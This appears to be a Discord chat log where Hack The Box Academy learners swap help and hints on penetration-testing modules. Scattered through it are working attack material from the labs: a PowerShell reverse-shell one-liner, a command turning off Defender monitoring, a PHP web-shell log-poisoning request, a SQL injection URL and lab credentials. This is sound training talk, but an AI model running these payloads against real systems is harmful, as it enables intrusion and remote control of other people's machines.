Gotcha. I'll give it a shot tomorrow and let you know. Thanks
Hackthebox discord server is full of offsec fans and their employees who trying to bring Oscp everytime and come up with some try harder lol
I understand Life is hard and you have to try harder but 3 years of study and failed 5 times plus my friends also failed many times it makes me think
I mean people who working as a pentester in 2022-2021-2020-2019 could not pass oscp
In multiple tries
help with my curl questions? 😮
attacking wordpress login list the all the possible method calls
What's your question
oops
curl -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>" http://165.227.224.62:32072/xmlrpc.php
i need to find all the number of possible method calls
how do i grep it and list the method call number?
Make a python script lol
Import os os.system("curl etc...")
dunno
you need to have at least one scripting lang good
Because you can automate many things faster
Sed grep awk those things are also important
Read this my bros it's inspiring
I prefer Ceh or some other companies instead of offsec
i agree i plan going back into that my odd getting me wanting to finish the hacking wordpress so my blue bar is all the way
Are u Doing htb modules?
academy ones yes
Allright, best of luck I can always be here to help (not always but always answers questions not on the server tho :()
.<
ahh thank you that worked. I see now that in some of the screen shots on the module page it showed that. Doh
Did anyone solve this :Repeat what you learned in this section to get a list of documents of the first 20 user uid's in /documents.php, one of which should have a '.txt' file with the flag.
List the module name and the section your working on.
it is called web attack ,the section name is Mass IDOR Enumeration and link is https://academy.hackthebox.com/module/134/section/1186
@wheat garden
it try to find txt in each uid's webiste,but i cant
I hadnt done that module yet
hi so still have no idea how to get all user from that OU but you can get all user and filter out the one in that OU (i don't think this is the intended way)
Hey anyone around did the File Upload - Whitelist? I've managed to upload files passed the filter but I can't seem to access the files in the directory, ||the files have a \ or //||. :C
the uploaded directory for that is the same as other section in ||/profile_images/||
this module show you can bypass filter with just putting weird character in the payload name but i didn't have to do any of that and so far i have only see issue with that method
so that's the issue maybe?
Module name: Shells&Payloads
Section name: Reverse Shell
Question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.
#Problem: The module gave me
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
and
PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true
But none of these code really work, i wonder what i do wrong
@wheat garden i think that have some problems
Use #starting-point
that link redirect to some google pay stuff on any run so a bit sussy for sure
hi guy i need some help with Active Directory LDAP - Skills question 6 (last question of the module) i can't find that target machine FQDN any where even with bloodhound or powerview never mind i'm F ing stupid
Attacking Common Services - Easy Please any hint.. i have tried but couldn't find any user credentials
[Shells & Payloads - The Live Engagement]
Hey Guys! Had anybody trouble after connecting to the foothold machine, interacting with the target machines?
Regarding academy's task 172.16.1.0/23 network would be the target, but looking at ifconfig there is a docker route to 172.17.1.0
The alleged target IP addresses 172.16.1.11, and 172.16.1.13 are both unreachable.
Command "route" hanging when called.
Any idea what's happening?
the have issue has been reported #858470491676737536 message
hint the first thing you need is ||smtp||
https://academy.hackthebox.com/module/39/section/414
METASPLOIT - Meterpreter
I just ran an nmap on the machine but the only program version I get is of IIS which in the tutorial is 6.0 and in the challenge 10.0
So far I've only found an exploit for 10.0 on vulnhub and it's paid
Am I supposed to attack another service than the module explains?
hint you got the right port but not the right service
@vital adder
nice
yes, i found that out but could find username.. then tried directory brute (hydra) found nothing.. and i'm wondering if that's from the word list
when using hydra did you use the full ||mail address|| as the username?
i used ||smtp-user-enum|| but couldn't find any available username
oh sorry i misread your first message my brain fried after the Active Directory LDAP - Skill Assessment also yep you are using the right and did you use the given users.list
also you can pretty much the example command for that tool in the ||SMTP|| section
Hi,
What are your thoughts on sharing badges on your LinkedIN?
So far my LinkedIn is dusty and empty because I have nothing to brag (certs, etc) about yet.
Thanks!
By brag I mean show something to employers
It can definitely reflect positively on your progress. Also consider doing reflection blog posts and sharing a little about what you learned. Doing blogs can help improve writing skills and show your ability to write to an audience.
Yes, I been thinking about writing blogs too since I created my LinkedIn account and probably will most likely share badges that are not easy to get
Thanks!
Yes and you can share links to your blog posts via LinkedIn. Theres also a #community-content channel you could share in here in the HTB Discord.
I'm trying to install crackmapexec on a pwn box and I get
And when I run pip install -r requirements.txt it also bugs out
crackmapexec is already installed on the pwnbox, simply run it with cme
Hey can I get help on the file transfers module section Windows File Transfer Methods ? I'm a not sure to understand the question correctly Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer.
If anyone can dm me it would be appreciated
Hi, I'm stuck on the assessment skill in Intro to Assembly. Has anyone solved it? :))
Help with Internal Password Spraying - from Windows
Evil-WinRM PS C:\tools> Import-Module .\DomainPasswordSpray.ps1
Evil-WinRM PS C:\tools> Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
[*] Now creating a list of users to spray...
[*] There appears to be no lockout policy.
[*] Removing disabled users from list.
[*] There are 2940 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 0 users gathered from the current user's domain
[*] The domain password policy observation window is set to minutes.
[*] Setting a minute wait in between sprays.
it just gets stuck here and freezes. It also does not generate a userlist. I could go in an make my own list from my last password spray i did with Kerbrute, but I am trying to get this to work the way it shows in the example.
I'm working through getting started module- privilege escalation and I have to connect to the root user. I already connected to user2 and copied the ssh key over to id_rsa file. When I try to ssh the root user, I get the message "Load key "id_rsa": invalid format", and a request for a password. My input looks like "ssh root@138.68.166.182 -p 32693 -i id_rsa". Why is the ssh key not recognizing? What am I doing wrong here?
i also did chmod 600 on the file
Someone can help me about ATTACKING ENTERPRISE NETWORKS - Post-Exploitation.
I run the dc_shell.exe but there isn't incoming connection. I don't understand:
I make 1 session with the first passage, I get the root on getuid.
I make a bg sessions and in the second session I make the step with set lhost 0.0.0.0.
But don't work.
Make sure you copied the whole key.
Thanks! I see what i was doing wrong. I wasn't copying over the BEGIN OPENSSH PRIVATE KEY and END OPENSSH PRIVATE KEY
Any someone give me a bit of hand with "attacking common services sql section" I got the hash but I can't find a password list that can crack it, I've tried the ones in the resources and rock you and all the ones in seclist/passwords/ but none in the sub directory from there. Am I on the right path or am I wasting my time?
@autumn garnet use rockyou.txt
Would you mind rewording your question please?
@placid quest I tried that and it came up exhausted
PM you
this shows up on every page for me now on academy, is that intended? I downloaded a new VPN file but it doesnt go away
Hi, everytime I connect via SSH to the target disposed to Section "Bind Shells" on "Shells and Payloads" for the exercies, the connection drops. I already changed my VPN file and it doesnt fix it. Suggestions?
try set your LHOST to the VPN IP, 0.0.0.0 might default to another interface
for me also... since a couple of days
Same. I'm doing attacking common applications and I thought it shows up because it deals with vhosts
cool, i guess it is a new feature/bug xD
Anyway, it's cool to see you learning here too. I just came across your youtube channel a few days ago and saved a few playlists to watch later
mrok (832963964970598430) has been banned until 2022-11-23 15:51:36 (UTC).
beat me to it
Thanks 🙂
i did -_-
flexing my gains everyday sir
can someone give me a hand on this?
I want to ask
why the HTB machine accept http://165.227.224.62:32306/search.php?port_code=cn' UNION select 1,2,3,4-- - as url
But my Virtual machine/ Windows cannot run this url parameter
Has anyone find why the url encoding cannot be disable
Hello All ! Anyone did the IDOR exercise from the web attacks module lately? The application never sets a uid parameter in the url and if I set manually, the links to the files are removed from the response
Maybe if you provided more detail, such as the section and what exactly you've tried
Hey guys, i have a question about "Skills Assessment - Using Web Proxies". I´m not sure if i understand question 3 right. Do i fuzz the request for the login page, with the decoded cookie and fuzz the last character (and then encode the whole cookie)? Or do i understand it incorrectly?
Hey @lament tartan your YouTube channel 👌
thanks mate 🥰
if i have a question about one machine, it's the best place for help?
HTB or HTB Academy?
HTB
ok thanks 😉
Unless there is a channel for that specific machine, then use that one
hello
https://academy.hackthebox.com/module/147/section/1391
Password Attacks - Password Mutations
I used the custom.rule in the module itself rather than the one attached in the resources but I still have 12655 options as pw..
This is going to take an eternity
Was able to solve this today! Thanks for the nudge!
Is there a way to run a metasploit module on a ssh session?
You should be able of setting up a metasploit listener and then sending a shell to it
I havent tried that myself yet though
good question! i would have done what Niux suggested but also can check: https://superuser.com/questions/1322515/meterpreter-on-ssh-connection
oh, you can just use ssh_login apparently: https://mysnippets443.wordpress.com/2020/03/09/metasploit-establish-a-ssh-session-for-further-use
Is there a way to drag and drop files on the pwnbox ? It doesnt seem to work for me
hmm it doesn't seem to be working for me
sessions
it doesn't like the session command
Can someone shoot me a hint for https://academy.hackthebox.com/module/147/section/1319
I've tried viewing the different files listed on the page, tried linpeas, tried running the exploits that linpeas mentioned and I got nada . >:c
@lament tartan how do u change the color of the terminal
right click > profile > profile preferences > colours
i have a "default" profile so i can quickly swap between them as some script outputs are colour coded (e.g. linpeas)
Great to hear!
Is there any way you can get the openvpn to boot up upon startup as its annoying rewriting the same code 50 times
@lament tartan thanks 😊
personally i put aliases in ~/.bash_aliases like alias vpn-academy='sudo openvpn --config /home/user/HTB-Academy.ovpn' so i can just type vpn-a and tab autocomplete. you could set it to run on startup but if you are switching between VPNs, e.g. academy, normal HTB, release arena it would probably be annoying
alright thank you
On the matter of coding what is a good source of knowledge for learning to code other than HTB as Im a noobie when it comes to coding as a whole
specifically assembly code*
What do i learn before HTB
Just start with fundamental and easy level HTB content. As you discover your learning gaps start looking into IT fundamentals. Also feel free to ask questions in this channel as they arise.
Do i just use linux or kali?
Try starting with ParrotOS or Kali Linux both are awesome.
Maybe my last one for today, i also started python, should i do hackthebox and python together or only 1 thing
Hack The Box Academy actually has a python course. So you can learn both together within the context of security.
Is it a beginner course for those who never did python?
Maybe start with this path https://academy.hackthebox.com/path/preview/information-security-foundations
Anytime
Hey everyone, can someone help me on Assembly's assessment (task 1) ?
Use what you learned in this section to obtain the flag which is hidden in the environment variables. Answer format: HTB{String}
This is from SSTI
I got RCE but I cant find the flag
@foggy light Do you get output from env and printenv?
yea
you can always give 'env | grep HTB' a shot
Just as I wrote it
🙂
Just typing env should give you tons of info
😬
it is bugged ? or i should have tried something else
yep same
Maybe someone else can tell you why 😓
Is anyone python savvy? Im trying to figure what "fline" means. It's specifically found in the basic brute force python script in broken auth module
LOL i wish i would have known this a long time ago
This is just a general question what is better Kali Linux or Parrot OS
Module Name: SQLMap Essentials
Section Name: Attack Tuning
Question 1: “What’s the contents of table flag5?”
Issue: The flag5 that is dumped from the table is incorrect as displayed and is not accepted when submitted.
Can someone help with this?
Sorted.... a '{' became a 'b'
Why isn't metasploit using the wordfile? All i get is this
these are my option settings. This isn't the wordfile i want to use but i wanted to try another one to see if that work. It worked once and about 20 entries it stopped and would never work again.
Hey i'm also stuck on the same skills assessment-Web and can't find the password also I tried with b.gates user but nothing it should took hours?
Someone is doing File Inclusion - Log Poisoning section?
How do I verify myself?
GET /index.php?language=/var/log/apache2/access.log%26cmd%3dpwd HTTP/1.1
Host: 178.62.99.223:32638
User-Agent: <?php system($_GET["cmd"]);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=apm772lhdg911hgjdg2cgo5rj4
Upgrade-Insecure-Requests: 1
Sec-GPC:
I just tried to read cmd=pwd but I received 500 error code but If I tried to see Apache Log poisoning I was able to see on burpsuite 😕
what about using valid parameter first before directory traverse? such as language=en?/../../../../../var/log/somelogblahblah
If it can be poisoned, then if the ssh is enable, try to poison via ssh such as ssh '<?php system($_GET[cmd]);?>'@x.x.x.x and then try language=....&cmd=somecommandblahblah again.
can anyone help on Advanced Command Obfuscation question of Command Injection Module?
never mind, figured it out
how do i connect to the vpn in my terminal
what line do i run
im trying to surf the web and its not working
hello hacks!
is there a channel to ask for help on box
I’m a total noob so pls go easy. Also lemme know if there’s a more appropriate place to ask this. I’m trying to find open ports on my live boot of parrot connected to my home wifi with google open and a video playing on another website. I did nmap -sV -sC -p- [ip address here] and it says all ports are closed. How is this possible with google open and a video playing? Or what am I doing wrong?
Please move to #red-team. This room is for academy modules
https://academy.hackthebox.com/module/147/section/1391
Password Attacks - Password Mutations
I've divided up the mut_password.list into multiple files and am slowly aiming them at ftp at 48 threads but I was wondering what the maximum amount of threads I can run is (Want to accelerate the process)
@mellow sparrow ports maybe closed or are due to firewall in the place that is blocking the scanning
Oh sorry I am on the “Getting Started” module under “Service Scanning” section. I’ll make sure to include that going forward
Ah, apologies, carry on 😂
Interesting. Thanks for that bit. I’ll keep exploring. Was thinking I did something wrong.
Is there some tool or method to scan how many concurrent threads the server can handle?
Hi everyone !
I am currently working on Active Directory Enumeration & Attacks
During all the exercices I have issues RDP into the hosts.
When I don't have an auth error, xfreerdp is stuck on a blackscreen.
What troubles me, is that none of those issues appear when using the attack box.
Does someone faced the same issues ?
Weird question but how do you get that msf prompt and colours? Mine is just msf6 MODULE >
I tried looking online but haven't found any official sources on how the metasploit prompt works
hmmm for prompt maybe check what version shows when you launch (i'm on v6.2.22-dev). the colours is just from my terminal colour scheme
note that my colours aren't very practical, i chose purely because i like the appearance but quite often swap to default profile for more useful colours where tool output requires
I'm on 6.2.23-dev
The only thing related to prompts I found is https://malicious.link/post/2011/2011-10-09-msfconsole-prompt-fiddling/, but it doesn't show anything about colours.
I don't think the colours of the jobs and agent strings are part of the terminal, since they're from the prompt
You just clicked on a malicious link..
Also I found out there's options if you have no module, could you show me yours?
looks like you're on kali? i'm using parrot so different terminal i guess
if i change to default colour profile it looks like this:
instead of this
Can I DM someone regarding the File Upload Attacks /Whitelist Filters?
Yep, I'm on kali. I'll definitely give parrot a try once I'm done with OSCP, it seems promising. Also since the htb team likes it I assume it can't be bad
I'll look more into the msf prompt settings, I'll let you know if I find the colour settings
You could ask here
@solar granite I have the same issue as mdolores here. I tried some extensions that worked (file successfully uploaded) but get the Not Found error:
I'll DM you, can't help without spoiling others
@lament tartan I found out how to set colours for the msf prompt: set PROMPT %red%A %yel%B %grn%C %blu%D. There's also white with %whi%
I had this pfp way before I even knew about parrot os haha. Just a coincidence really
😛
hi everyone 😄
Im working on the Attacking Common Services SMB Section. I think I have the right password list... but im not sure. CME isnt showing any hits, SMB_Login msf module is returning an error about encryption, and hydra is giving an error when trying smbv2. kinda lost here lol any help would be greatly appreciated
@solar zodiac use xhydra maybe
I've never tried xhydra. I'm doing something wrong here 😦 Im getting an error about encryption. Is there anyone I can dm :D?
i cant able to curl this url https://www.inlanefreight.com showing **curl: (6) Could not resolve host: www.inlanefreight.com**
any one facing this issue in htb academy module linux fundamentals
@tender jasper use -k
i have used curl -k https://www.inlanefreight.com -o test.txt but facing same issue @placid quest
@tender jasper certificate
what certificate @placid quest
@tender jasper because it is https
do i need to add anything @placid quest
No just -k to ignore certificate
i tried **curl: (6) Could not resolve host: www.inlanefreight.com** but same result @placid quest
i think this host is not working in htb academy @placid quest
Ok
Add it to /etc/hosts
Need help with Command Injection Skills Assessment. I keep getting Malicious request denied.
Hint: ||try a different command||
you mean instead of ||trying to move the file, just try to cat it out||
Not really. I didn't know you're trying to move the file, you didn't mention what you're trying to do initially
i was thinking since ||we can move files, maybe move the file to tmp and then try to read it from there||
which kali should i download
For people having the same issues while working on the Active Directory module
Use this command : xfreerdp /u:'htb-student' /p:'Academy_student_AD!' /v:10.129.149.125 /cert:ignore /gfx:rfx
It seems that the hosts have some issues with gfx
What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word).. how do i get to the authenticated report
Hi, im new at this . Can someone help me?
What software do people use for creating the HTB Bug Bounty Hunter certification report?
quit
Anyone mind providing some guidance on the module Linux Privilege Escalation - Privileged Groups? I understand I am supposed to grep the directory /var/log as the user secaudit since this user is a part of the adm group. However, I am wondering how to impersonate/escalate to this user. I see the steps used to abuse LXD container functionality to get escalation. Any help or advice is appreciated.
Hey guys,
I’m stuck on Password Attacks - Password Reuse / Default Passwords - "Use the user’s credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer."
My question is, are we supposed to SSH into sam’s host and dig around for credentials? I’ve tried searching into config files, ssh keys, etc, but am getting permission errors.
Or are we supposed to use credential stuffing ( hydra -C <user_pass.list> ://) using a file with user:pass as explained in the module ? I created a file with sam, kira, will and default sql usernames. So for every line in the file I have sam:pass, kira:pass, root:pass, admin:pass etc. (pass being Sam’s password discovered in previous module) I mutated this list using rules and then tried to use Hydra with no success. Am I completely missing the ball on this one? Any guidance is appreciated.
@shy warren Just check the default password cheat list
the cred for that section is ||in one of the link||
completely fumbled the ball on this one... Thanks yall!
i have nothing in my note about getting any user, all i have in my note is if you run id and your user is in a group named ||adm|| then you are on the right user
if you are in the Vulnerability Assessment module then look for the smb that ||doesn't have password protect ||
if you still need help then one of the method you can use is the ||base64|| one and also you can only read the flag when you got RCE
I am having trouble with the pivoting module. Specifically I am trying to set up a socks proxy through meterpreter and also being able to use proxychains and see a network within a network. Any help?
so are you having issue setting that up?
is it possible to download the iso that hackthebox is using on the virtual servers?
the pwnbox?
correct
@vital adder I realized now why when I first did that, it didn't work. I ssh'ed in as htb-student user and not as secaudit user.
@vital adder is it possible?
Thank you for your help!
@bright ridge the pwnbox is basically just a custom htb themed version of parrot os, check the github pin message in #710108839063846964, that shows you how to "install pwnbox" on your parrot os
@bright ridge https://github.com/theGuildHall/pwnbox
yes but #modules message
There is no official version
So you have to google around for scripts that give you the 'look and feel' of a pwnbox
i see thanks
for the last machine it don't have the firewall on so you can still ping it but a ping sweep only work half of the time for me for some reason so i recommend a gui tool call netwatcher
Hey. Did you solve it?
no one help nice community
it would be easier for us to help if you say what your issue is
@fluid yoke Try starting with a more concise question..
If you're looking for a place to start head over to the academy and sort the modules on Fundamental // Tier 0
Do you guys think its a good idea for a 15 year old to enroll in HTB's penetration testing cert & course
@elfin nacelle do u have experience before u do penetration testing cert
if you willing to put in effort then yep
Well I would go through all the modules and practice etc, I have some prior experience with programming (idk how much that helps). Python, C, Lua etc. I've used tools like burpsuite before
unfortunately not a lot but it will help (but burp will)
I may try
Beginner to what tho
Yea I am. I might do both tbh but I liked HTB more with its learning style
yep do both
Only problem is money 🤣 I am broke af
Can't even afford the student discount
tryhackme subscription is 2 dollars more expensive but you will get access to all 500 room and the unlimited attack box (thm pwnbox)
@elfin nacelle If you're new to linux you could always look at the overthewire challenges
But they might be too easy if you've done some previous stuff
oh yeah forgot the ping but this is for you if you are looking for the last target #modules message
oh
hint ||the flag is on the share drive||
Hi! Could anybody help me with xss session hijacking? i've completed everything else in the module, but i just don't know which payload should be used to verify the place for the vulnerable input
wait what auth? if you are on the domain controller you are just get the flag in the ||share drive|| without any cred
oh then that's not the last machine ohh you are having issue finding the cred for DC sorry i'm dumb
yep
so did you get the user (named start with an v) with mimikatz?
if so then the cred for that user in somewhere in the bottom of the dump
if you output it into a file it's way more easier to get the password
also hint the ||password is in clear text||
yep i think that's what you're supposed to do
Hello I need help on section Passwords Attack Lab -Easy of Password Attacks module, I put a lot of time in this one and I still can't manage to pass.
So there are 2 ports open on this machine which are SSH 22 and FTP 21 and
I tried to force FTP protocol with the mutated password list I crafted and username list provided in resources and I waited 1 hour it doesn't find.
I tried a lot of combination (surely not enough), I also tried to list words of 6 characters in inlanefreight.com website and make a password list with it (even mutated).
I appreciate your help thanks !
so after making the php and js file like in the example the payload you can use has some stuff in front of the payload (oh hint the right payload is one of the payloads under ||Loading a Remote Script||)
i think have the old wordlist of this module but hint you don't need a ||mutated list|| for this lab
and also i think you are on the right path but not the ||right wordlist||
i just download the new one and it doesn't matter
Thank you MRtom ! I will try with your hints, good luck on your steps as well
oh i finish this module a while back
I use the password attack wordlist given in the module
yep that's the one
Ok so i'm trying hydra on FTP without any mutated password
i think they update the wordlist some time ago (they just change some stuff in it)
Yes !! and it seems like they added sections Pass the hash on this module while i was working on it, or i'm blind haha
Very good module though but I am not proud to have spend 3 weeks on it
oh that's a bit rough but everyone learns at their own pace
Yeah haha anyway I try this I hope it's gonna work thanks again
no idea how tf did i forget i have that dump file somewhere in my note but if you still have no luck with that i'll recommend re-check the output you should be able to find the cred in there or if you want to have a sanity check on mimikatz stuff shoot me a dm with your mimikatz command
Any who can help me at passwords attack module ?
Thanks I found the creds ! 🙂
sure what's the issue?
for some info here is how much tool installed on kali linux https://www.kali.org/tools/
and here is no "the best tool"
If this isn’t related to HTB Academy modules could you please move to #hacker-lounge or #red-team
if you are looking in general thing like port scanning then there is a best thing for that it's nmap
Yeah but why would you port scan in the first place most of my friends who tackle actual domains skip that because its not worth alerting any SOC team
that is different from something like a black box attack and most ctf is like a black box attack
hi quick question how can i find both of that channel? thing like this i can't really redirect them to #1024429874246590575 because it just some general question but both of those channel look be great for thing like this
Hi! currently working on windows privilege escalation skill assessment part I. I have reverse shell exploiting a web service but really struggling with privesc (tried potatoes and spoofers and a couple others but I am starting to think I am going off in the wrong direction). Anyone I could talk to ? 🙂
someone can help me with this question in windows privilege escalation module : Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.
Guys. At passwords attacks section passwd - I can’t edit the passwd file, can’t open the shadow or opasswd file. Tried to remove the x from passwd and save to login without password but with no success since I still don’t have root access. I neither can Scp the files out to crack the hashes. Any clue?
|| Try using the find command and see if you can find anything interesting. || Just finished that one yesterday and just finished the next page just now. That windows VM breaks constantly.
can any one help with CROSS-SITE SCRIPTING (XSS) :Phishing: having issues removing the image url element on the page?
The last question for the DNS portion of the Footprinting module is driving me insane. I've used the smallest wordlist and I've used dnsenum on every combination of FQDN and IP address. Anyone got some advice to help on this?
Footprinting - Medium Lab
Not sure why i'm getting an error logging in to MSSQL with DEFAULT MSSQL-User:password:
I'm not familiar with Windows but here's the error. Maybe it's not a password problem, maybe i'm just stupid:
Login failed for user '<DEFAULT MSSQL USER>'
I found the file literally with the credentials DEFAULT MSSQL-User:password. I don't get it.
Can anyone help with linux priv esc?
specifically this question " Use the privileged group rights of the secaudit user to locate a flag. "
what module/section are you in?
privileged groups
Thats the direct link to the module
ahh, it's an lxc/lxd escape
I tried to follow along with the learning material but at the first step i couldn't even unzip the alpine file
I can't tell you how to use tar/zip. That's something you'll have to look up
Are your sure it's not a tar file?
"zip" and "tar" are slightly different.
its .zip
I now realise I might be looking in the wrong spot
I am part of the 'adm' group
Are you on the machine??
yes
DM me
bump... 
Edit: I am still very confused with this thingie. Unless it's a red-herring, i have no fucking clue what's wrong... I'm looking right at the password
It's right in front of me.. it's not changed
Am I missing something really obvious?? I am not familiar with Windows bullshit.
hello :D, Im hardcore stuck on Firewall and IDS/IPS Evasion - Medium Lab, anyone that can shed some light for me in this ?
So, what steps did you take?
can i pm u ?
sure
What have you tried so far?
have you tried using that password anywhere else?
I'm not sure where else it sould be used. [default-MSSQL-user] is the name of the <user>:<password>
Unless it works for "Administrator" but I don't see why that would make a difference. I'm trying to access MSSQL.
I have tried with SERVICE-NAME/Administrator but to no avail.
can I pm you
sure
Hello all,
Anyone can help me on 'Broken Authentication'->'Predictable Reset Token' ?
I have changed the timezone, added the htbadmin user before the time*1000
Have I forgotten a thing ?
@languid ginkgo First get the exact time when your token was generated, including the milliseconds and from then bruteforce the token increasing the milliseconds by 1 every time EX: your time*1000 + 1 etc ..
It's what I'm doing, can I pm you?
Reverse Shell & Payloads - The live engagement.
I have got the shell on Host-3 but I am not able to see the flag.txt file. It is in the Administrator user and I think I have to change the password, but I am not able to do it. I have used “net user Administrator password” but it gives me access denied. Any ideas please?
I have also tried with net user DefaultAccount password, and it doesn’t work either. something escapes me 🤨
Hi, anybody working on footprinting module (SMB)? I have problems with this question "What is the full system path of that specific share?". I expected rpcclient works or enum4linux reveals something but I receive an error (NT_STATUS_NOTFOUND). So, if anybody can give a nudge. I appreciate. Thank you
@zenith schooner what is the problem
the problem is I expected to use rpcclient -U "" <ip> to retrieve that information but receive a NT_STATUS_NOTFOUND. I also tried enum4linux -A <IP> and I got a lot of information but none about the physical path. So, I am not sure if I miss something or there is something wrong. It is weird because enum4linux uses rpcclient calls and they look like they work.
@zenith schooner read the man page of rpcclient
ok. I will. I want to use netshareenumall but the first step is getting a "rpcclient shell". thank you
@echo zenith just use "type C:\Users\Administrator\Desktop\Skills-flag.txt"
It does not work for me because the flag file is in Administrator and permissions are needed, I am as a guest. Gives a hint to change the password, in the credentials file. but no idea what to do. Anyway, I already tried that and it says "access denied"
If you used Eternalblue you should be admin
no, I directly uploaded a shell with laudanum, I'll try with eternalblue
thx
Hii
@pale stump hei
can someone help me with Q1 in LLMNR/NBT-NS Poisoning - from Linux section?
Started responder with default options and it has been running for 10 minutes now but didn't capture any hashes yet. Am I supposed to browse something manually to capture hashes?
@slim plover which module
Sorry, the module is ACTIVE DIRECTORY ENUMERATION & ATTACKS
What is active directory ?
@slim plover i think u need to first connect to ssh
@gusty fulcrum https://en.m.wikipedia.org/wiki/Active_Directory
yes, I did that and have been running responder in the remote attack box
I can see it has been sending some poisoned responses but is not capturing any hashes
@slim plover that may be a problem
I will try resetting the box I guess
Thanks
Is Here Any Hacker..??
No hacker, only Zuul
Means I tried to make a joke, and failed
Oo

👻
@ocean night
What's up?
@gusty fulcrum np
@pale stump - what is it you need?
I Want To Know Hacking
I'd suggest starting with the Academy at https://academy.hackthebox.com - there are loads of free modules to get you started!
I'd also appreciate it if you removed that advert from your "About Me" section on your profile @pale stump
I Didn't Understand
The advert, in your "About Me" section on your profile. Remove it.
What Adverb Tell The Line Or Word
Seriously?
lul
Tell N
Last chance..
lol @ teaching others to make money online without any investment and wanting to learn hacking
@ocean night Does It Ok
Thank you
Now
??
@solar granite That is businesses
The Academy is a platform that will introduce you to Hacking, the methods, the tools, along with practical exercises.
Go forth, and learn!
It's Free Of Cost
Is It
Yes, a lot of modules are free.
@ocean night Okh Then I'll Try
Have fun!